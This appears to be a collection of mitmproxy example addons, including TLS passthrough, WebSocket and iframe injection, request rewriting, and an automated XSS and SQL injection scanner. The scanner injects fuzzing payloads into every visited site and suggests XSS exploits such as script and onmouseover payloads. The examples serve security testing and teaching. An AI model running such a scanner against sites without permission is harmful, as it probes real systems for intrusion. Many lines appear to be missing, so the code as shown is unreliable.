        self.history = collections.defaultdict(lambda: collections.deque(maxlen=200))

    def should_intercept(self, server_address):
            True, if we should attempt to intercept the connection.
            False, if we want to employ pass-through instead.
        raise NotImplementedError()

    def record_success(self, server_address):

    def record_failure(self, server_address):

    def record_skipped(self, server_address):

class ConservativeStrategy(_TlsStrategy):
    Conservative Interception Strategy - only intercept if there haven't been any failed attempts
    in the history.

    def should_intercept(self, server_address):
        if InterceptionResult.failure in self.history[server_address]:
            return False
        return True

class ProbabilisticStrategy(_TlsStrategy):
    Fixed probability that we intercept a given connection.

    def __init__(self, p):
        self.p = p
        super(ProbabilisticStrategy, self).__init__()

    def should_intercept(self, server_address):
        return random.uniform(0, 1) < self.p

class TlsFeedback(TlsLayer):
    Monkey-patch _establish_tls_with_client to get feedback if TLS could be established
    successfully on the client connection (which may fail due to cert pinning).

    def _establish_tls_with_client(self):
        server_address = self.server_conn.address

            super(TlsFeedback, self)._establish_tls_with_client()
        except TlsProtocolException as e:
            raise e

# inline script hooks below.

tls_strategy = None

def load(l):
        "tlsstrat", int, 0, "TLS passthrough strategy (0-100)",

def configure(updated):
    global tls_strategy
    if ctx.options.tlsstrat > 0:
        tls_strategy = ProbabilisticStrategy(float(ctx.options.tlsstrat) / 100.0)
        tls_strategy = ConservativeStrategy()

def next_layer(next_layer):
    This hook does the actual magic - if the next layer is planned to be a TLS layer,
    we check if we want to enter pass-through mode instead.
    if isinstance(next_layer, TlsLayer) and next_layer._client_tls:
        server_address = next_layer.server_conn.address

        if tls_strategy.should_intercept(server_address):
            # We try to intercept.
            # Monkey-Patch the layer to get feedback from the TLSLayer if interception worked.
            next_layer.__class__ = TlsFeedback
            # We don't intercept - reply with a pass-through layer and add a "skipped" entry.
            mitmproxy.ctx.log("TLS passthrough for %s" % repr(next_layer.server_conn.address), "info")
            next_layer_replacement = RawTCPLayer(next_layer.ctx, ignore=True)

#  Example: complex/websocket_inject_message.py

This example shows how to inject a WebSocket message to the client.
Every new WebSocket connection will trigger a new asyncio task that
periodically injects a new message to the client.
import asyncio
import mitmproxy.websocket

class InjectWebSocketMessage:

    async def inject(self, flow: mitmproxy.websocket.WebSocketFlow):
        i = 0
        while not flow.ended and not flow.error:
            await asyncio.sleep(5)
            flow.inject_message(flow.client_conn, 'This is the #{} injected message!'.format(i))
            i += 1

    def websocket_start(self, flow):

addons = [InjectWebSocketMessage()]

#  Example: complex/xss_scanner.py


 __   __ _____ _____     _____
 \ \ / // ____/ ____|   / ____|
  \ V /| (___| (___    | (___   ___ __ _ _ __  _ __   ___ _ __
   > <  \___ \\___ \    \___ \ / __/ _` | '_ \| '_ \ / _ \ '__|
  / . \ ____) |___) |   ____) | (_| (_| | | | | | | |  __/ |
 /_/ \_\_____/_____/   |_____/ \___\__,_|_| |_|_| |_|\___|_|

This script automatically scans all visited webpages for XSS and SQLi vulnerabilities.

Usage: mitmproxy -s xss_scanner.py

This script scans for vulnerabilities by injecting a fuzzing payload (see PAYLOAD below) into 4 different places
and examining the HTML to look for XSS and SQLi injection vulnerabilities. The XSS scanning functionality works by
looking to see whether it is possible to inject HTML based off of of where the payload appears in the page and what
characters are escaped. In addition, it also looks for any script tags that load javascript from unclaimed domains.
The SQLi scanning functionality works by using regular expressions to look for errors from a number of different
common databases. Since it is only looking for errors, it will not find blind SQLi vulnerabilities.

The 4 places it injects the payload into are:
1. URLs         (e.g. https://example.com/ -> https://example.com/PAYLOAD/)
2. Queries      (e.g. https://example.com/index.html?a=b -> https://example.com/index.html?a=PAYLOAD)
3. Referers     (e.g. The referer changes from https://example.com to PAYLOAD)
4. User Agents  (e.g. The UA changes from Chrome to PAYLOAD)

Reports from this script show up in the event log (viewable by pressing e) and formatted like:

===== XSS Found ====
XSS URL: http://daviddworken.com/vulnerableUA.php
Injection Point: User Agent
Suggested Exploit: <script>alert(0)</script>
Line: 1029zxcs'd"ao<ac>so[sb]po(pc)se;sl/bsl\eq=3847asd


from html.parser import HTMLParser
from typing import Dict, Union, Tuple, Optional, List, NamedTuple
from urllib.parse import urlparse
import re
import socket

import requests

from mitmproxy import http
from mitmproxy import ctx

# The actual payload is put between a frontWall and a backWall to make it easy
# to locate the payload with regular expressions
FRONT_WALL = b"1029zxc"
BACK_WALL = b"3847asd"
PAYLOAD = b"""s'd"ao<ac>so[sb]po(pc)se;sl/bsl\\eq="""

# A XSSData is a named tuple with the following fields:
#   - url -> str
#   - injection_point -> str
#   - exploit -> str
#   - line -> str
XSSData = NamedTuple('XSSData', [('url', str),
                                 ('injection_point', str),
                                 ('exploit', str),
                                 ('line', str)])

# A SQLiData is named tuple with the following fields:
#   - url -> str
#   - injection_point -> str
#   - regex -> str
#   - dbms -> str
SQLiData = NamedTuple('SQLiData', [('url', str),
                                   ('injection_point', str),
                                   ('regex', str),
                                   ('dbms', str)])

VulnData = Tuple[Optional[XSSData], Optional[SQLiData]]
Cookies = Dict[str, str]

def get_cookies(flow: http.HTTPFlow) -> Cookies:
    """ Return a dict going from cookie names to cookie values
          - Note that it includes both the cookies sent in the original request and
            the cookies sent by the server """
    return {name: value for name, value in flow.request.cookies.fields}

def find_unclaimed_URLs(body, requestUrl):
    """ Look for unclaimed URLs in script tags and log them if found"""
    def getValue(attrs: List[Tuple[str, str]], attrName: str) -> Optional[str]:
        for name, value in attrs:
            if attrName == name:
                return value
        return None

    class ScriptURLExtractor(HTMLParser):
        script_URLs: List[str] = []

        def handle_starttag(self, tag, attrs):
            if (tag == "script" or tag == "iframe") and "src" in [name for name, value in attrs]:
                self.script_URLs.append(getValue(attrs, "src"))
            if tag == "link" and getValue(attrs, "rel") == "stylesheet" and "href" in [name for name, value in attrs]:
                self.script_URLs.append(getValue(attrs, "href"))

    parser = ScriptURLExtractor()
    for url in parser.script_URLs:
        url_parser = urlparse(url)
        domain = url_parser.netloc
        except socket.gaierror:
            ctx.log.error(f"XSS found in {requestUrl} due to unclaimed URL \"{url}\".")

def test_end_of_URL_injection(original_body: str, request_URL: str, cookies: Cookies) -> VulnData:
    """ Test the given URL for XSS via injection onto the end of the URL and
        log the XSS if found """
    parsed_URL = urlparse(request_URL)
    path = parsed_URL.path
    if path != "" and path[-1] != "/":  # ensure the path ends in a /
        path += "/"
    path += FULL_PAYLOAD.decode('utf-8')  # the path must be a string while the payload is bytes
    url = parsed_URL._replace(path=path).geturl()
    body = requests.get(url, cookies=cookies).text.lower()
    xss_info = get_XSS_data(body, url, "End of URL")
    sqli_info = get_SQLi_data(body, original_body, url, "End of URL")
    return xss_info, sqli_info

def test_referer_injection(original_body: str, request_URL: str, cookies: Cookies) -> VulnData:
    """ Test the given URL for XSS via injection into the referer and
        log the XSS if found """
    body = requests.get(request_URL, headers={'referer': FULL_PAYLOAD}, cookies=cookies).text.lower()
    xss_info = get_XSS_data(body, request_URL, "Referer")
    sqli_info = get_SQLi_data(body, original_body, request_URL, "Referer")
    return xss_info, sqli_info

def test_user_agent_injection(original_body: str, request_URL: str, cookies: Cookies) -> VulnData:
    """ Test the given URL for XSS via injection into the user agent and
        log the XSS if found """
    body = requests.get(request_URL, headers={'User-Agent': FULL_PAYLOAD}, cookies=cookies).text.lower()
    xss_info = get_XSS_data(body, request_URL, "User Agent")
    sqli_info = get_SQLi_data(body, original_body, request_URL, "User Agent")
    return xss_info, sqli_info

def test_query_injection(original_body: str, request_URL: str, cookies: Cookies):
    """ Test the given URL for XSS via injection into URL queries and
        log the XSS if found """
    parsed_URL = urlparse(request_URL)
    query_string = parsed_URL.query
    # queries is a list of parameters where each parameter is set to the payload
    queries = [query.split("=")[0] + "=" + FULL_PAYLOAD.decode('utf-8') for query in query_string.split("&")]
    new_query_string = "&".join(queries)
    new_URL = parsed_URL._replace(query=new_query_string).geturl()
    body = requests.get(new_URL, cookies=cookies).text.lower()
    xss_info = get_XSS_data(body, new_URL, "Query")
    sqli_info = get_SQLi_data(body, original_body, new_URL, "Query")
    return xss_info, sqli_info

def log_XSS_data(xss_info: Optional[XSSData]) -> None:
    """ Log information about the given XSS to mitmproxy """
    # If it is None, then there is no info to log
    if not xss_info:
    ctx.log.error("===== XSS Found ====")
    ctx.log.error("XSS URL: %s" % xss_info.url)
    ctx.log.error("Injection Point: %s" % xss_info.injection_point)
    ctx.log.error("Suggested Exploit: %s" % xss_info.exploit)
    ctx.log.error("Line: %s" % xss_info.line)

def log_SQLi_data(sqli_info: Optional[SQLiData]) -> None:
    """ Log information about the given SQLi to mitmproxy """
    if not sqli_info:
    ctx.log.error("===== SQLi Found =====")
    ctx.log.error("SQLi URL: %s" % sqli_info.url)
    ctx.log.error("Injection Point: %s" % sqli_info.injection_point)
    ctx.log.error("Regex used: %s" % sqli_info.regex)
    ctx.log.error("Suspected DBMS: %s" % sqli_info.dbms)

def get_SQLi_data(new_body: str, original_body: str, request_URL: str, injection_point: str) -> Optional[SQLiData]:
    """ Return a SQLiDict if there is a SQLi otherwise return None
        String String URL String -> (SQLiDict or None) """
    # Regexes taken from Damn Small SQLi Scanner: https://github.com/stamparm/DSSS/blob/master/dsss.py#L17
        "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
        "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
        "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver",
                                 r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}",
                                 r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
        "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
        "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
        "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
        "SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*",
                   r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
        "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
    for dbms, regexes in DBMS_ERRORS.items():
        for regex in regexes:  # type: ignore
            if re.search(regex, new_body, re.IGNORECASE) and not re.search(regex, original_body, re.IGNORECASE):
                return SQLiData(request_URL,
    return None

# A qc is either ' or "
def inside_quote(qc: str, substring_bytes: bytes, text_index: int, body_bytes: bytes) -> bool:
    """ Whether the Numberth occurrence of the first string in the second
        string is inside quotes as defined by the supplied QuoteChar """
    substring = substring_bytes.decode('utf-8')
    body = body_bytes.decode('utf-8')
    num_substrings_found = 0
    in_quote = False
    for index, char in enumerate(body):
        # Whether the next chunk of len(substring) chars is the substring
        next_part_is_substring = (
            (not (index + len(substring) > len(body))) and
            (body[index:index + len(substring)] == substring)
        # Whether this char is escaped with a \
        is_not_escaped = (
            (index - 1 < 0 or index - 1 > len(body)) or
            (body[index - 1] != "\\")
        if char == qc and is_not_escaped:
            in_quote = not in_quote
        if next_part_is_substring:
            if num_substrings_found == text_index:
                return in_quote
            num_substrings_found += 1
    return False

def paths_to_text(html: str, string: str) -> List[str]:
    """ Return list of Paths to a given str in the given HTML tree
          - Note that it does a BFS """

    def remove_last_occurence_of_sub_string(string: str, substr: str) -> str:
        """ Delete the last occurrence of substr from str
        String String -> String
        index = string.rfind(substr)
        return string[:index] + string[index + len(substr):]

    class PathHTMLParser(HTMLParser):
        currentPath = ""
        paths: List[str] = []

        def handle_starttag(self, tag, attrs):
            self.currentPath += ("/" + tag)

        def handle_endtag(self, tag):
            self.currentPath = remove_last_occurence_of_sub_string(self.currentPath, "/" + tag)

        def handle_data(self, data):
            if string in data:

    parser = PathHTMLParser()
    return parser.paths

def get_XSS_data(body: Union[str, bytes], request_URL: str, injection_point: str) -> Optional[XSSData]:
    """ Return a XSSDict if there is a XSS otherwise return None """
    def in_script(text, index, body) -> bool:
        """ Whether the Numberth occurrence of the first string in the second
            string is inside a script tag """
        paths = paths_to_text(body.decode('utf-8'), text.decode("utf-8"))
            path = paths[index]
            return "script" in path
        except IndexError:
            return False

    def in_HTML(text: bytes, index: int, body: bytes) -> bool:
        """ Whether the Numberth occurrence of the first string in the second
            string is inside the HTML but not inside a script tag or part of
            a HTML attribute"""
        # if there is a < then lxml will interpret that as a tag, so only search for the stuff before it
        text = text.split(b"<")[0]
        paths = paths_to_text(body.decode('utf-8'), text.decode("utf-8"))
            path = paths[index]
            return "script" not in path
        except IndexError:
            return False

    def inject_javascript_handler(html: str) -> bool:
        """ Whether you can inject a Javascript:alert(0) as a link """
        class injectJSHandlerHTMLParser(HTMLParser):
            injectJSHandler = False

            def handle_starttag(self, tag, attrs):
                for name, value in attrs:
                    if name == "href" and value.startswith(FRONT_WALL.decode('utf-8')):
                        self.injectJSHandler = True

        parser = injectJSHandlerHTMLParser()
        return parser.injectJSHandler
    # Only convert the body to bytes if needed
    if isinstance(body, str):
        body = bytes(body, 'utf-8')
    # Regex for between 24 and 72 (aka 24*3) characters encapsulated by the walls
    regex = re.compile(b"""%s.{24,72}?%s""" % (FRONT_WALL, BACK_WALL))
    matches = regex.findall(body)
    for index, match in enumerate(matches):
        # Where the string is injected into the HTML
        in_script_val = in_script(match, index, body)
        in_HTML_val = in_HTML(match, index, body)
        in_tag = not in_script_val and not in_HTML_val
        in_single_quotes = inside_quote("'", match, index, body)
        in_double_quotes = inside_quote('"', match, index, body)
        # Whether you can inject:
        inject_open_angle = b"ao<ac" in match  # open angle brackets
        inject_close_angle = b"ac>so" in match  # close angle brackets
        inject_single_quotes = b"s'd" in match  # single quotes
        inject_double_quotes = b'd"ao' in match  # double quotes
        inject_slash = b"sl/bsl" in match  # forward slashes
        inject_semi = b"se;sl" in match  # semicolons
        inject_equals = b"eq=" in match  # equals sign
        if in_script_val and inject_slash and inject_open_angle and inject_close_angle:  # e.g. <script>PAYLOAD</script>
            return XSSData(request_URL,
        elif in_script_val and in_single_quotes and inject_single_quotes and inject_semi:  # e.g. <script>t='PAYLOAD';</script>
            return XSSData(request_URL,
        elif in_script_val and in_double_quotes and inject_double_quotes and inject_semi:  # e.g. <script>t="PAYLOAD";</script>
            return XSSData(request_URL,
        elif in_tag and in_single_quotes and inject_single_quotes and inject_open_angle and inject_close_angle and inject_slash:
            # e.g. <a href='PAYLOAD'>Test</a>
            return XSSData(request_URL,
        elif in_tag and in_double_quotes and inject_double_quotes and inject_open_angle and inject_close_angle and inject_slash:
            # e.g. <a href="PAYLOAD">Test</a>
            return XSSData(request_URL,
        elif in_tag and not in_double_quotes and not in_single_quotes and inject_open_angle and inject_close_angle and inject_slash:
            # e.g. <a href=PAYLOAD>Test</a>
            return XSSData(request_URL,
        elif inject_javascript_handler(body.decode('utf-8')):  # e.g. <html><a href=PAYLOAD>Test</a>
            return XSSData(request_URL,
        elif in_tag and in_double_quotes and inject_double_quotes and inject_equals:  # e.g. <a href="PAYLOAD">Test</a>
            return XSSData(request_URL,
                           '" onmouseover="alert(0)" t="',
        elif in_tag and in_single_quotes and inject_single_quotes and inject_equals:  # e.g. <a href='PAYLOAD'>Test</a>
            return XSSData(request_URL,
                           "' onmouseover='alert(0)' t='",
        elif in_tag and not in_single_quotes and not in_double_quotes and inject_equals:  # e.g. <a href=PAYLOAD>Test</a>
            return XSSData(request_URL,
                           " onmouseover=alert(0) t=",
        elif in_HTML_val and not in_script_val and inject_open_angle and inject_close_angle and inject_slash:  # e.g. <html>PAYLOAD</html>
            return XSSData(request_URL,
            return None
    return None

# response is mitmproxy's entry point
def response(flow: http.HTTPFlow) -> None:
    assert flow.response
    cookies_dict = get_cookies(flow)
    resp = flow.response.get_text(strict=False)
    assert resp
    # Example: http://xss.guru/unclaimedScriptTag.html
    find_unclaimed_URLs(resp, flow.request.url)
    results = test_end_of_URL_injection(resp, flow.request.url, cookies_dict)
    # Example: https://daviddworken.com/vulnerableReferer.php
    results = test_referer_injection(resp, flow.request.url, cookies_dict)
    # Example: https://daviddworken.com/vulnerableUA.php
    results = test_user_agent_injection(resp, flow.request.url, cookies_dict)
    if "?" in flow.request.url:
        # Example: https://daviddworken.com/vulnerable.php?name=
        results = test_query_injection(resp, flow.request.url, cookies_dict)

#  pathod

#  Example: pathod/libpathod_pathoc.py

#!/usr/bin/env python
from pathod import pathoc

p = pathoc.Pathoc(("google.com", 80))

#  simple

#  Example: simple/add_header.py

from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    flow.response.headers["newheader"] = "foo"

#  Example: simple/add_header_class.py

from mitmproxy import http

class AddHeader:
    def response(self, flow: http.HTTPFlow) -> None:
        flow.response.headers["newheader"] = "foo"

addons = [AddHeader()]

#  Example: simple/custom_contentview.py

This example shows how one can add a custom contentview to mitmproxy.
The content view API is explained in the mitmproxy.contentviews module.
from mitmproxy import contentviews

class ViewSwapCase(contentviews.View):
    name = "swapcase"
    content_types = ["text/plain"]

    def __call__(self, data, **metadata) -> contentviews.TViewResult:
        return "case-swapped text", contentviews.format_text(data.swapcase())

view = ViewSwapCase()

def load(l):

def done():

#  Example: simple/custom_option.py

This example shows how addons can register custom options
that can be configured at startup or during execution
from the options dialog within mitmproxy.


$ mitmproxy --set custom=true
$ mitmproxy --set custom   # shorthand for boolean options
from mitmproxy import ctx

def load(l):
    ctx.log.info("Registering option 'custom'")
    l.add_option("custom", bool, False, "A custom option")

def configure(updated):
    if "custom" in updated:
        ctx.log.info("custom option value: %s" % ctx.options.custom)

#  Example: simple/filter_flows.py

This script demonstrates how to use mitmproxy's filter pattern in scripts.
from mitmproxy import flowfilter
from mitmproxy import ctx, http

class Filter:
    def __init__(self):
        self.filter: flowfilter.TFilter = None

    def configure(self, updated):
        self.filter = flowfilter.parse(ctx.options.flowfilter)

    def load(self, l):
            "flowfilter", str, "", "Check that flow matches filter."

    def response(self, flow: http.HTTPFlow) -> None:
        if flowfilter.match(self.filter, flow):
            ctx.log.info("Flow matches filter:")

addons = [Filter()]

#  Example: simple/internet_in_mirror.py

This script reflects all content passing through the proxy.
from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    reflector = b"<style>body {transform: scaleX(-1);}</style></head>"
    flow.response.content = flow.response.content.replace(b"</head>", reflector)

#  Example: simple/io_read_dumpfile.py

#!/usr/bin/env python
# Simple script showing how to read a mitmproxy dump file
from mitmproxy import io
from mitmproxy.exceptions import FlowReadException
import pprint
import sys

with open(sys.argv[1], "rb") as logfile:
    freader = io.FlowReader(logfile)
    pp = pprint.PrettyPrinter(indent=4)
        for f in freader.stream():
    except FlowReadException as e:
        print("Flow file corrupted: {}".format(e))

#  Example: simple/io_write_dumpfile.py

This script demonstrates how to generate a mitmproxy dump file,
as it would also be generated by passing `-w` to mitmproxy.
In contrast to `-w`, this gives you full control over which
flows should be saved and also allows you to rotate files or log
to multiple files in parallel.
import random
import sys
from mitmproxy import io, http
import typing  # noqa

class Writer:
    def __init__(self, path: str) -> None:
        self.f: typing.IO[bytes] = open(path, "wb")
        self.w = io.FlowWriter(self.f)

    def response(self, flow: http.HTTPFlow) -> None:
        if random.choice([True, False]):

    def done(self):

addons = [Writer(sys.argv[1])]
# This script determines if request is an HTML webpage and if so seeks out
# relative links (<a href="./about.html">) and expands them to absolute links
# In practice this can be used to front an indexing spider that may not have the capability to expand relative page links.
# Usage: mitmdump -s link_expander.py or mitmproxy -s link_expander.py

import re
from urllib.parse import urljoin

def response(flow):

    if "Content-Type" in flow.response.headers and flow.response.headers["Content-Type"].find("text/html") != -1:
        pageUrl = flow.request.url
        pageText = flow.response.text
        pattern = (r"<a\s+(?:[^>]*?\s+)?href=(?P<delimiter>[\"'])"
        rel_matcher = re.compile(pattern, flags=re.IGNORECASE)
        rel_matches = rel_matcher.finditer(pageText)
        map_dict = {}
        for match_num, match in enumerate(rel_matches):
            (delimiter, rel_link) = match.group("delimiter", "link")
            abs_link = urljoin(pageUrl, rel_link)
            map_dict["{0}{1}{0}".format(delimiter, rel_link)] = "{0}{1}{0}".format(delimiter, abs_link)
        for map in map_dict.items():
            pageText = pageText.replace(*map)
            # Uncomment the following to print the expansion mapping
            # print("{0} -> {1}".format(*map))
        flow.response.text = pageText

#  Example: simple/log_events.py

from mitmproxy import ctx

def load(l):
    ctx.log.info("This is some informative text.")
    ctx.log.warn("This is a warning.")
    ctx.log.error("This is an error.")

#  Example: simple/modify_body_inject_iframe.py

# (this script works best with --anticache)
from bs4 import BeautifulSoup
from mitmproxy import ctx, http

class Injector:
    def load(self, loader):
            "iframe", str, "", "IFrame to inject"

    def response(self, flow: http.HTTPFlow) -> None:
        if ctx.options.iframe:
            html = BeautifulSoup(flow.response.content, "html.parser")
            if html.body:
                iframe = html.new_tag(
                html.body.insert(0, iframe)
                flow.response.content = str(html).encode("utf8")

addons = [Injector()]

#  Example: simple/modify_form.py

from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    if flow.request.urlencoded_form:
        # If there's already a form, one can just add items to the dict:
        flow.request.urlencoded_form["mitmproxy"] = "rocks"
        # One can also just pass new form data.
        # This sets the proper content type and overrides the body.
        flow.request.urlencoded_form = [
            ("foo", "bar")

#  Example: simple/modify_querystring.py

from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    flow.request.query["mitmproxy"] = "rocks"

#  Example: simple/redirect_requests.py

This example shows two ways to redirect flows to another server.
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    # pretty_host takes the "Host" header of the request into account,
    # which is useful in transparent mode where we usually only have the IP
    # otherwise.
    if flow.request.pretty_host == "example.org":
        flow.request.host = "mitmproxy.org"

#  Example: simple/send_reply_from_proxy.py

This example shows how to send a reply from the proxy immediately
without sending any data to the remote server.
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    # pretty_url takes the "Host" header of the request into account, which
    # is useful in transparent mode where we usually only have the IP otherwise.

    if flow.request.pretty_url == "http://example.com/path":
        flow.response = http.HTTPResponse.make(
            200,  # (optional) status code
            b"Hello World",  # (optional) content
            {"Content-Type": "text/html"}  # (optional) headers

#  Example: simple/websocket_messages.py

import re
from mitmproxy import ctx

def websocket_message(flow):
    # get the latest message
    message = flow.messages[-1]

    # was the message sent from the client or server?
    if message.from_client:
        ctx.log.info("Client sent a message: {}".format(message.content))
        ctx.log.info("Server sent a message: {}".format(message.content))

    # manipulate the message content
    message.content = re.sub(r'^Hello', 'HAPPY', message.content)

    if 'FOOBAR' in message.content:
        # kill the message and not send it to the other endpoint

#  Example: simple/wsgi_flask_app.py

This example shows how to graft a WSGI app onto mitmproxy. In this
instance, we're using the Flask framework (http://flask.pocoo.org/) to expose
a single simplest-possible page.
from flask import Flask
from mitmproxy.addons import wsgiapp

app = Flask("proxapp")

def hello_world() -> str:
    return 'Hello World!'

addons = [
    # Host app at the magic domain "proxapp.local" on port 80. Requests to this
    # domain and port combination will now be routed to the WSGI app instance.
    wsgiapp.WSGIApp(app, "proxapp.local", 80)
    # SSL works too, but the magic domain needs to be resolvable from the mitmproxy machine due to mitmproxy's design.
    # mitmproxy will connect to said domain and use serve its certificate (unless --no-upstream-cert is set)
    # but won't send any data.
    # mitmproxy.ctx.master.apps.add(app, "example.com", 443)